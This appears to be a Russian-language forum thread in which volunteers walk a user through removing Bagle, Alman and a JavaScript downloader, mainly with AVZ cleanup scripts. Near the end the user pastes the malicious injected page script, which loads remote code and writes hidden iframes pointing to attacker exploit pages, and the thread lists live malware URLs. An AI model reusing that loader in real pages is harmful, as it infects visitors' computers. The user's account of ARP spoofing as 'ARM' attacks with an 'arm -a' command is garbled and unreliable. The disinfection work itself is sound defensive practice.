На компе похоже кучка вирусов!!!! Сам перезагружается, штампует кучу файлов!
Printable View
На компе похоже кучка вирусов!!!! Сам перезагружается, штампует кучу файлов!
Отключите восстановление системы и антивирус!
[URL="http://virusinfo.info/showthread.php?t=4491"]Пофиксить[/URL]
[CODE]O2 - BHO: (no name) - {7C8D1401-A58D-A81C-CD24-A5915C4517C7} - (no file)
O20 - AppInit_DLLs: ukrth.dll,hjmh.dll,gyjert.dll,tjdegtr.dll,fyhje.dll,hgnmjsdg.dll,jkhjsd.dll,hjtdrh.dll,hyjmt.dll,fydgky.dll,ytjkyer.dll,dgrgfs.dll,gfcfg.dll,frntrn.dll,qrhhb.dll,drghszd.dll,fngn.dll,gnfctt.dll,xgnfn.dll,xfgnhcgfm.dll,serger.dll,bnxnb.dll,fxgnfx.dll,jzijj.dll,xfgnfx.dll,serghjm.dll,thsddh.dll,xbcvxb.dll,zfdzb.dll,xdndn.dll,xdfntt.dll,hgfhk.dll,dnteh.dll,xfng.dll,njritc.dll,chmfcmh.dll,jwlah.dll,gmnait.dll,hfjg.dll,thurh.dll,mgmgmm.dll,oqrthc.dll,dhugtj.dll,jyjlt.dll,ijatnaw.dll,sehhter.dll,fhjfg.dll,zdbdb.dll,ydgn.dll,dbfb.dll,fjnbv.dll,uyjtd.dll,setrhes.dll,cdxbfxdb.dll,xfgnxfn.dll,gjkhj.dll,xdhdg.dll,rhs.dll,mrjhtjd.dll,zdbfbd.dll,fjyjy.dll,fxnfnh.dll,bjrvm.dll,ektvm.dll,rdthr.dll,yjrfe.dll,dscef.dll,crugd.dll,lariytrz.dll,hjaiq.dll,kduy.dll,hkfgh.dll,awef.dll,dfhsh.dll,ethsh.dll,stehs.dll,sthth.dll,wfhyt.dll,rgghjj.dll,ghjkdr.dll,hfther.dll,[/CODE]
[URL="http://virusinfo.info/showthread.php?t=7239"]AVZ, меню "Файл - Выполнить скрипт" -- Скопировать ниже написанный скрипт-- Нажать кнопку "Запустить".
[/URL]
[CODE]begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('C:\WINDOWS\system32\zxfhajpg.exe','');
QuarantineFile('C:\WINDOWS\system32\zptlcsys.dll','');
QuarantineFile('C:\WINDOWS\system32\zdesfx.dll','');
QuarantineFile('C:\WINDOWS\system32\zaztamsn.exe','');
QuarantineFile('C:\WINDOWS\system32\yxfhcjpg.dll','');
QuarantineFile('C:\WINDOWS\system32\ukrth.dll','');
QuarantineFile('C:\WINDOWS\system32\swsxachu.dll','');
QuarantineFile('C:\WINDOWS\system32\pedadt.dll','');
QuarantineFile('C:\WINDOWS\system32\opshbbty.dll','');
QuarantineFile('C:\WINDOWS\system32\lpsgajba.exe','');
QuarantineFile('C:\WINDOWS\system32\lpmxajkl.exe','');
QuarantineFile('C:\WINDOWS\system32\ismhasrv.exe','');
QuarantineFile('C:\WINDOWS\system32\hjmh.dll','');
QuarantineFile('C:\WINDOWS\system32\hhrdxd.dll','');
QuarantineFile('C:\WINDOWS\system32\hfrdzx.dll','');
QuarantineFile('C:\WINDOWS\system32\apsgdjba.dll','');
QuarantineFile('zfdzb.dll','');
QuarantineFile('zdbfbd.dll','');
QuarantineFile('zdbdb.dll','');
QuarantineFile('ytjkyer.dll','');
QuarantineFile('yjrfe.dll','');
QuarantineFile('ydgn.dll','');
QuarantineFile('xgnfn.dll','');
QuarantineFile('xfng.dll','');
QuarantineFile('xfgnxfn.dll','');
QuarantineFile('xfgnhcgfm.dll','');
QuarantineFile('xfgnfx.dll','');
QuarantineFile('xdndn.dll','');
QuarantineFile('xdhdg.dll','');
QuarantineFile('xdfntt.dll','');
QuarantineFile('xbcvxb.dll','');
QuarantineFile('wfhyt.dll','');
QuarantineFile('uyjtd.dll','');
QuarantineFile('tjdegtr.dll','');
QuarantineFile('thurh.dll','');
QuarantineFile('thsddh.dll','');
QuarantineFile('sthth.dll','');
QuarantineFile('stehs.dll','');
QuarantineFile('setrhes.dll','');
QuarantineFile('serghjm.dll','');
QuarantineFile('serger.dll','');
QuarantineFile('sehhter.dll','');
QuarantineFile('rhs.dll','');
QuarantineFile('rgghjj.dll','');
QuarantineFile('rdthr.dll','');
QuarantineFile('qrhhb.dll','');
QuarantineFile('oqrthc.dll','');
QuarantineFile('njritc.dll','');
QuarantineFile('mrjhtjd.dll','');
QuarantineFile('mgmgmm.dll','');
QuarantineFile('lariytrz.dll','');
QuarantineFile('kduy.dll','');
QuarantineFile('jzijj.dll','');
QuarantineFile('jyjlt.dll','');
QuarantineFile('jwlah.dll','');
QuarantineFile('jkhjsd.dll','');
QuarantineFile('ijatnaw.dll','');
QuarantineFile('hyjmt.dll','');
QuarantineFile('hkfgh.dll','');
QuarantineFile('hjtdrh.dll','');
QuarantineFile('hjaiq.dll','');
QuarantineFile('hgnmjsdg.dll','');
QuarantineFile('hgfhk.dll','');
QuarantineFile('hfther.dll','');
QuarantineFile('hfjg.dll','');
QuarantineFile('gyjert.dll','');
QuarantineFile('gnfctt.dll','');
QuarantineFile('gmnait.dll','');
QuarantineFile('gjkhj.dll','');
QuarantineFile('ghjkdr.dll','');
QuarantineFile('gfcfg.dll','');
QuarantineFile('fyhje.dll','');
QuarantineFile('fydgky.dll','');
QuarantineFile('fxnfnh.dll','');
QuarantineFile('fxgnfx.dll','');
QuarantineFile('frntrn.dll','');
QuarantineFile('fngn.dll','');
QuarantineFile('fjyjy.dll','');
QuarantineFile('fjnbv.dll','');
QuarantineFile('fhjfg.dll','');
QuarantineFile('ethsh.dll','');
QuarantineFile('ektvm.dll','');
QuarantineFile('dscef.dll','');
QuarantineFile('drghszd.dll','');
QuarantineFile('dnteh.dll','');
QuarantineFile('dhugtj.dll','');
QuarantineFile('dgrgfs.dll','');
QuarantineFile('dfhsh.dll','');
QuarantineFile('dbfb.dll','');
QuarantineFile('crugd.dll','');
QuarantineFile('chmfcmh.dll','');
QuarantineFile('cdxbfxdb.dll','');
QuarantineFile('bnxnb.dll','');
QuarantineFile('bjrvm.dll','');
QuarantineFile('awef.dll','');
QuarantineFile('C:\WINDOWS\System32\ukrth.dll','');
QuarantineFile('C:\WINDOWS\System32\hjmh.dll','');
DeleteFile('C:\WINDOWS\System32\hjmh.dll');
DeleteFile('C:\WINDOWS\System32\ukrth.dll');
DeleteFile('awef.dll');
DeleteFile('bjrvm.dll');
DeleteFile('bnxnb.dll');
DeleteFile('cdxbfxdb.dll');
DeleteFile('chmfcmh.dll');
DeleteFile('crugd.dll');
DeleteFile('dbfb.dll');
DeleteFile('dfhsh.dll');
DeleteFile('dgrgfs.dll');
DeleteFile('dhugtj.dll');
DeleteFile('dnteh.dll');
DeleteFile('drghszd.dll');
DeleteFile('dscef.dll');
DeleteFile('ektvm.dll');
DeleteFile('ethsh.dll');
DeleteFile('fhjfg.dll');
DeleteFile('fjnbv.dll');
DeleteFile('fjyjy.dll');
DeleteFile('fngn.dll');
DeleteFile('frntrn.dll');
DeleteFile('fxgnfx.dll');
DeleteFile('fxnfnh.dll');
DeleteFile('fydgky.dll');
DeleteFile('fyhje.dll');
DeleteFile('gfcfg.dll');
DeleteFile('ghjkdr.dll');
DeleteFile('gjkhj.dll');
DeleteFile('gmnait.dll');
DeleteFile('gnfctt.dll');
DeleteFile('gyjert.dll');
DeleteFile('hfjg.dll');
DeleteFile('hfther.dll');
DeleteFile('hgfhk.dll');
DeleteFile('hgnmjsdg.dll');
DeleteFile('hjaiq.dll');
DeleteFile('hjtdrh.dll');
DeleteFile('hkfgh.dll');
DeleteFile('hyjmt.dll');
DeleteFile('ijatnaw.dll');
DeleteFile('jkhjsd.dll');
DeleteFile('jwlah.dll');
DeleteFile('jyjlt.dll');
DeleteFile('jzijj.dll');
DeleteFile('kduy.dll');
DeleteFile('lariytrz.dll');
DeleteFile('mgmgmm.dll');
DeleteFile('njritc.dll');
DeleteFile('oqrthc.dll');
DeleteFile('qrhhb.dll');
DeleteFile('rdthr.dll');
DeleteFile('rgghjj.dll');
DeleteFile('rhs.dll');
DeleteFile('sehhter.dll');
DeleteFile('serger.dll');
DeleteFile('serghjm.dll');
DeleteFile('setrhes.dll');
DeleteFile('stehs.dll');
DeleteFile('sthth.dll');
DeleteFile('thsddh.dll');
DeleteFile('thurh.dll');
DeleteFile('tjdegtr.dll');
DeleteFile('uyjtd.dll');
DeleteFile('xbcvxb.dll');
DeleteFile('xdfntt.dll');
DeleteFile('xdhdg.dll');
DeleteFile('xdndn.dll');
DeleteFile('xfgnfx.dll');
DeleteFile('xfgnhcgfm.dll');
DeleteFile('xfgnxfn.dll');
DeleteFile('xfng.dll');
DeleteFile('xgnfn.dll');
DeleteFile('ydgn.dll');
DeleteFile('yjrfe.dll');
DeleteFile('ytjkyer.dll');
DeleteFile('zdbdb.dll');
DeleteFile('zdbfbd.dll');
DeleteFile('C:\WINDOWS\system32\apsgdjba.dll');
DeleteFile('C:\WINDOWS\system32\hfrdzx.dll');
DeleteFile('C:\WINDOWS\system32\hhrdxd.dll');
DeleteFile('C:\WINDOWS\system32\hjmh.dll');
DeleteFile('C:\WINDOWS\system32\ismhasrv.exe');
DeleteFile('C:\WINDOWS\system32\lpmxajkl.exe');
DeleteFile('C:\WINDOWS\system32\lpsgajba.exe');
DeleteFile('C:\WINDOWS\system32\opshbbty.dll');
DeleteFile('C:\WINDOWS\system32\pedadt.dll');
DeleteFile('C:\WINDOWS\system32\swsxachu.dll');
DeleteFile('C:\WINDOWS\system32\ukrth.dll');
DeleteFile('C:\WINDOWS\system32\yxfhcjpg.dll');
DeleteFile('C:\WINDOWS\system32\zaztamsn.exe');
DeleteFile('C:\WINDOWS\system32\zdesfx.dll');
DeleteFile('C:\WINDOWS\system32\zptlcsys.dll');
DeleteFile('C:\WINDOWS\system32\zxfhajpg.exe');
DelBHO('{7C8D1401-A58D-A81C-CD24-A5915C4517C7}');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.
[/CODE]
Пришлите карантин по правилам,очистите карантин Доктора и повторите логи.
Спасибо! Но строка 020 не фиксится, она сразу появляется ... точно так же не могу отключить эти файлы из автозагрузки с помощью авз4, удаляю, а они сразу же тут же появляются дублирующие, такого ещё не видел!!!
кстати всё время пишет, что конфликт IP в сети, хотя адрес уникальный!!!
Не подскажите ли, как можно убить Appinit_dll, я так понимаю, что это библиотеки которые грузятся даже в сейф моде и удалить их из реестра невозможно!!! У меня там целый рассадник и скрипт совсем ничего не изменил!!! Что делать?
Логи подготовить надо. Будем долечивать.
Буду пытаться успеть сделать проверку ... не успеваю скрипт лечения и сбора информации - виснет наглухо!!! есть ещё способ предоставить инфу? могу выложить хайджекс и простой срипт сбора инфы!
давайте логи которые есть :)
Всё что успел нарыть ...
вооот ... успел выложить!!!
не знаю как удалить из appinit, жестоко уничтожают систему, каждые три минуты зависает наглухо!!!
AVZ надо обновить срочно. Тек. версия 4.30 Она больше покажет.
Сделал с обновлёнными базами!
"Восст. системы" надо отключить.
Для начала попробуем вот этого убить:
[CODE]begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('C:\WINDOWS\system32\wintems.exe','');
DeleteFile('C:\WINDOWS\system32\wintems.exe');
BC_ImportDeletedList;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.[/CODE]
Если попадет в карантин, то прислать.
получилось выполнить скрипт сбора и лечения!!!! прогрессс ... восстановление отключил, сейчас попробую выловить гада!
есть в инфектед, залил!
Пропадаю с первой страницы, жду очень помощи!!!
Не бойся, тебя не бросим. AVZ показывает, что "Восст" включено. Не порядок.
AVZ очень много чего побил, попробуй лог лечения сделать еще раз. Если малваре не уйдут, будем убивать скриптом.
[size="1"][color="#666686"][B][I]Добавлено через 35 минут[/I][/B][/color][/size]
У тебя Багл завелся. Будем пытаться его вывести. Станд. скрипт для него сейчас выложу.
[CODE]begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('%System32%\drivers\srosa.sys','');
QuarantineFile('%System32%\drivers\hldrrr.exe','');
QuarantineFile('%System32%\wintems.exe','');
QuarantineFile('%System32%\drivers\mdelk.exe','');
QuarantineFile('%System32%\mdelk.exe','');
DeleteFile('%System32%\drivers\hldrrr.exe');
DeleteFile('%System32%\drivers\srosa.sys');
DeleteFile('%System32%\wintems.exe');
DeleteFile('%System32%\drivers\mdelk.exe');
DeleteFile('%System32%\mdelk.exe');
BC_ImportALL;
ExecuteSysClean;
If DirectoryExists('%System32%\drivers\down') then
begin
DeleteFileMask('%System32%\drivers\down', '*.*', true);
DeleteDirectory('%System32%\drivers\down');
If DirectoryExists('%System32%\drivers\down') then
AddToLog('Папка down не удалена') else AddToLog('Папка down удалена');
end
else
AddToLog('Папки down нет');
If DirectoryExists('%System32%\drivers\downld') then
begin
DeleteFileMask('%System32%\drivers\downld', '*.*', true);
DeleteDirectory('%System32%\drivers\downld');
If DirectoryExists('%System32%\drivers\downld') then
AddToLog('Папка downld не удалена') else AddToLog('Папка downld удалена');
end
else
AddToLog('Папки downld нет');
If RegKeyParamExists('HKEY_CURRENT_USER', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'drvsyskit') then
begin
AddToLog('Обнаружен параметр в реестре drvsyskit');
RegKeyParamDel('HKEY_CURRENT_USER', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'drvsyskit');
If RegKeyParamExists('HKEY_CURRENT_USER', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'drvsyskit') then
AddToLog('Ошибка удаления параметра drvsyskit') else
AddToLog('Параметр drvsyskit успешно удален');
end;
If RegKeyParamExists('HKEY_CURRENT_USER', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'german.exe') then
begin
AddToLog('Обнаружен параметр в реестре german.exe');
RegKeyParamDel('HKEY_CURRENT_USER', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'german.exe');
If RegKeyParamExists('HKEY_CURRENT_USER', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'german.exe') then
AddToLog('Ошибка удаления параметра german.exe') else
AddToLog('Параметр german.exe успешно удален');
end;
if RegKeyExists('HKEY_CURRENT_USER', 'Software\FirstRRRun') then
begin
AddToLog('Найден ключ реестра FirstRRRun');
RegKeyDel('HKEY_CURRENT_USER', 'Software\FirstRRRun');
If RegKeyExists('HKEY_CURRENT_USER', 'Software\FirstRRRun') then
AddToLog('Ошибка удаления ключа реестра FirstRRRun') else
AddToLog('ключ реестра FirstRRRun успешно удален');
end;
BC_DeleteSvc('srosa');
BC_LogFile(GetAVZDirectory + 'boot_clr_B_d.log');
If BC_Activate then AddToLog('BootCleaner успешно активирован') else AddToLog('Внимание!!! BootCleaner не активирован!');
SaveLog(GetAVZDirectory + 'B_d.txt');
RebootWindows(true);
end.[/CODE]
Логи будут сохранены: B_d.txt и boot_clr_B_d.log от Бутклинера в папке AVZ. Их надо будет прислать.
[size="1"][color="#666686"][B][I]Добавлено через 18 минут[/I][/B][/color][/size]
wintems.exe - Email-Worm.Win32.Bagle.of по Касперскому.
скрипт выполнил ... кое-что осталось в appinit и в hookах, комп перестал виснуть, однако, имхо, это ненадолго ... плодятся гады в прогрессии!
вот блин, только что завис ....
есть зависимость зависания от подключения к интернету, сейчас отрубил, вроде бы работает без зависаний!!!
... завтра выложу новые логи...
вроде бы уничтожил гадов, может что осталось? посмотрите плз!
...не хочет грузится syscheck
Вот еще парочку файлов надо проверить:
[CODE]begin
ClearQuarantine;
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('C:\WINDOWS\system32\yzztimsn.dll','');
QuarantineFile('C:\WINDOWS\system32\mpmyfapi.dll','');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.[/CODE]
Пришли их.
В AVZ - Сервис - Менеджер расширений IE - удалить те, строчки где файлы отсутствуют.
[size="1"][color="#666686"][B][I]Добавлено через 1 минуту[/I][/B][/color][/size]
Перед выполнением скрипта загрузи старый карантин.
карантин и инфицированные файлы я грохнул утром ...
скрипт сделал, высылаю логи!
на компе стоит NOD32 - матерится частенько, что на компе ещё много вирусов, на всякий случай вышлю его лог (в логе много из того, что авз4 как раз в карантин засунул, но есть кое-что новенькое, чего др. веб не замечает)
Win32/PSW.OnLineGames.NOA - вот это прибегает с флешек. Нужно будет менять пароли от онлайн-игр.
hттp://root.51113.com/root.gif Win32/TrojanDownloader.Murlo.NN trojan - это откуда прилетела гадость.
D:\DAF\PARTSR~1\PartsRapido.Exe Win32/Alman.NAB virus - вот это большая пакость.
C:\WINDOWS\AppPatch\Jview.dll Win32/Agent.NVY trojan - вот этого мы вообще не увидели.
ещё интересная особенность, система не грузится в безопасном режиме.
hттp://root.51113.com/root.gif Win32/TrojanDownloader.Murlo.NN trojan - вот эта гадость переодически вылетает, наверное что-то провоцирует её скачивание ... только запускаешь IE сразу вылетает
D:\DAF\PARTSR~1\PartsRapido.Exe Win32/Alman.NAB virus - эта гадость быстро распространяется, сталкивался, но иногда, благо, просто лечиться, хотя часто выдирается с корнем и файл становится не работоспособным
C:\WINDOWS\AppPatch\Jview.dll Win32/Agent.NVY trojan а вот что с этим делать?
Для восст Safe Mode AVZ - Файл - Восст системы - п.10
Временные файлы Инета почисти.
Найти через AVZ: C:\WINDOWS\AppPatch\Jview.dll, поместить в карантин и затем удалить.
Логи посмотрим, м.б. что-нибудь еще увидим.
Через avz не ищется ... с логами не понял, ещё раз выложить или вы старые ещё посмотрите?
Да, новые, после всех последних удалений.
сделал, появилась новая ошибка, вываливается окно, скрин в приложении.
Вот эти два файла знаешь что это такое:
C:\Documents and Settings\MANAGER\Application Data\m\flec006.exe
C:\Program Files\KsCatalog\webtogo\wtgstart.bat
Если нет, то загрузить их в карантин и прислать нам на анализ.
По поводу ошибки: можно через AVZ сделать поиск в реестре по имени файла, что выдается на окошке и удалить ключики реестра, где он встретиться.
первый файл не известен, второй знаю ... сейчас попробую его выслать ...
и с ошибкой, спасибо за совет, сейчас попробую!!!!
C:\Documents and Settings\MANAGER\Application Data\m\flec006.exe - файл найти не удалось
и тот файл, что в скрине, который я вам прислал тоже обнаружить не получается, есть только похожее C:\WINDOWS\Prefetch\ORZ.EXE-3238823D.pf, удалял его - всё равно появляется - эта фигня уже достала, ничего скачать нельзя, как только с нета что-нибдуь хочешь вытащить - лезет!!! в реестре ссылок нет, удалить её можно, но следующий клик по любой ссыле её оживляет!
из вирусов постоянно беспокоит :http:root.51113.com/root.gif - Win32/TrojanDownloader.Murlo.NN trojan, как с ним бороться?
[size="1"][color="#666686"][B][I]Добавлено через 2 часа 0 минут[/I][/B][/color][/size]
Господа, помогите избавится от непонятного вируса, ничто его не детектит! при попытке что-нибудь скачать с нета вылетает ошибка, скриншот в посте повыше. При чём эта тварь как-будто бы быстро распространяется по сети!
[size="1"][color="#666686"][B][I]Добавлено через 2 часа 0 минут[/I][/B][/color][/size]
Кто-нибудь поможет, господа?
[size="1"][color="#666686"][B][I]Добавлено через 46 минут[/I][/B][/color][/size]
Нашёл,что вирус свежачёк
[url]http://www.prevx.com/filenames/X468714806485356630-X1484125085/ORZ.EXE.html[/url]
только никак не получается скачать програмулину, которая вроде бы как избавит от это ГАДА!!! если у кого нибудь есть в наличии сей продукт, сбросте на [email][email protected][/email] !?
[size="1"][color="#666686"][B][I]Добавлено через 2 часа 16 минут[/I][/B][/color][/size]
меня наверное скоро забанят?:)
не помогает данная прога, какая то она странная,больше похоже на то, что она ещё вирей напустит. каким образом можно вычислить как появляется файл orz.exe? я уж и хайджеком всё подчистил всё из автозагрузки снёс, а он уже и у соседей сидит этот вирь! ещё интересно то, что он вылетает только при работе с IE, если,например, запустить Firefox или Opera то работать можно, но только ничего не скачивается, когда хочешь что-нибудь скачать скорости нет совсем. прову звонил, да и сам мониторил, спам не идёт, канал нормальный, а ничего скачать нельзя!
[size="1"][color="#666686"][B][I]Добавлено через 1 минуту[/I][/B][/color][/size]
ЗЫ: не теряю надежды :)
[size="1"][color="#666686"][B][I]Добавлено через 15 минут[/I][/B][/color][/size]
вот собсно и сам зловред,его даже в блокноте посмотреть можно ...
Недавно этого root.gif гонял.
Попробуйте отключившись от интернета почистить все временные файлы и кеш браузера у всех пользователей. Даже для пользователей NetworkService, LocalService и System.
И после всего этого, не подключаясь к и-нету еще раз прогнать 3-й скрипт.
Пункт 2 правил выполнялся? Альман - файловый вирус. Или можете сделать полную проверку в [url=http://devbuilds.kaspersky-labs.com/devbuilds/AVPTool/]AVPTool[/url].
Пункт 2 выполнялся, с этой штукой "orz.exe" - ничего не помоглою Спасибо за совет по поводу root.gif, сейчас попробую снести! С альманом конечно трудно бороться, но его вроде бы победил, а вот что за таинственный зловред, который не даёт нормально работать с интернетом??? его даже идентифицировать трудно!
[size="1"][color="#666686"][B][I]Добавлено через 2 часа 26 минут[/I][/B][/color][/size]
и всё таки кто-нибудь встречался с этим гадом "orz.exe" ... есть подозрение, что это производная он вируса Trojan-Downloader.JS.Multi.cj, который каким то образом всё время проявляется файлом c:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\Content.IE5\0HAB4LQB\ads[1].js -определяется только семейством касперов!
[size="1"][color="#666686"][B][I]Добавлено через 32 минуты[/I][/B][/color][/size]
Вот грёбаный скрипт, который содержит файл orz.exe: собсно вот он и добавляет его в страничку, реагирует только експлоер, хотя работает скрипт во всех браузерах! как же его изничтожить??? похоже свежый уродец, ещё нет решения???
<script language="javascript" SRC="http://hk.www404.cn:53/ads.js"></script> <html><script>window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<iframe src=http://flash.w3cpublic.cn:8080/f/ilink.html width=100 height=0></iframe>");
}
else{document.write("<iframe src=http://flash.w3cpublic.cn:8080/f/flink.html width=100 height=0></iframe>");}
}
</script></html>
[size="1"][color="#666686"][B][I]Добавлено через 25 минут[/I][/B][/color][/size]
единственные два компа,которые не пострадали были БЕЗ АНТИВИРУСА)))))))))))))
[quote=Petro8i4;243678]
всё таки кто-нибудь встречался с этим гадом "orz.exe" ... есть подозрение, что это производная он вируса Trojan-Downloader.JS.Multi.cj, который каким то образом всё время проявляется файлом c:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\Content.IE5\0HAB4LQB\ads[1].js -определяется только семейством касперов[/quote]
А не в этом ли причина [CODE]
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.daemon-search.com/default
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://dt-updates.com/activate?query=Xd4suOWfXEeqjdgZwfln5qaIBSihY7w%2fXRU6y8q0wThPLDjEaLP10wZA089n5wFomZhw4D7VOJx8%2b2KiDghHDotIpl5aEU8TCj9NL8UxTfjAxSm6VmB40aDuAtAOH3VnRVEly6t%2fyaycAIh%2bLqATLJ1YDgifSumDnqtWbwQvOIO7LDadj5P934fBiLuin5Xvw3cWYD2soOumxA3beDoerLHAyWsb8EdpAiaD6LYaJq87Iut1pZygBYht%2bDmL4KMJ8o%2bpglZ1gRRZAoEcx7skyEWZtqU%2bhCzPLmJo97hgF90%3d[/CODE]
Если эти адреса не Вами прописаны, пофиксите указаные строчки
Очень желательно поставить 3-й сервиспак.
ну первая известна, просто daemon tools ставил, она и прописалась, а вот вторая нет, попробую снести, а sp3 уже накатил, думал обновлю винду и всё пройдёт, даже ИЕ 8 поставил, проверил авп и крюит в безопасном режиме, снёс все темпы под корень, а вместе с ними и корзину и систем вольюм ... ничего не помогает(((
Господа, получилась очень интересная тема!
ответ нашёлся на одном буржуйском сайте, ссылку не дам, не сохранилась ... по гуглу нашёл!
Вобщим Multi.cj (создаёт в темпе файл orz.exe и прописывает на страничках такой код: <script language="javascript" SRC="http://hk.www404.cn:53/ads.js"></script>, каспер кстати пытается при любом обращении не пропускать его, но тщетно, только удаляет файл c:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\Content.IE5\0HAB4LQB\ads[1].js) используется для poofing (пуфинга) или ARM атак, как я понимаю это то, что называют "хорошо забытое старое"! Вобщем алгоритм выявления в сети ARM-вирусов,в частности именно этого, cmd, потом arm -a, и смотрим какой MAC адрес компа в сети совпадает с MACом шлюза, если такой есть - значит сеть заражена, отрубаем комп (компы) от сети и нафиг сносим всё что на них есть, хотя можно попробовать и полечить, но я после первой попытки отказался, просто на компе и так почти ничего не было! Есть второй способ определения: берём програмку ARProtect, устанавливаем, и она считает ARM атаки и показывает, что за гад это делает. Господа, вобщем надеюсь никому не придётся с этим столкнуться! У меня вся сеть трещала, при чём каждый антивирь находит свой вирус!! И ошибки чуть ли не на каждом компе разные!
Удачи в победах над вирусами!
Молодец, что не сдался. Твоя И-ция важна для лечения других, за нее отдельное СПС.
Я просто не мог сдаться ;) Выхода не было!
Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]3[/B][*]Обработано файлов: [B]6[/B][*]В ходе лечения обнаружены вредоносные программы:
[LIST=1][*] c:\\windows\\system32\\wintems.exe - [B]Email-Worm.Win32.Bagle.of[/B] (DrWEB: Win32.HLLM.Beagle)[*] \\orz.exe - [B]Trojan-Downloader.JS.Iframe.si[/B][/LIST][/LIST]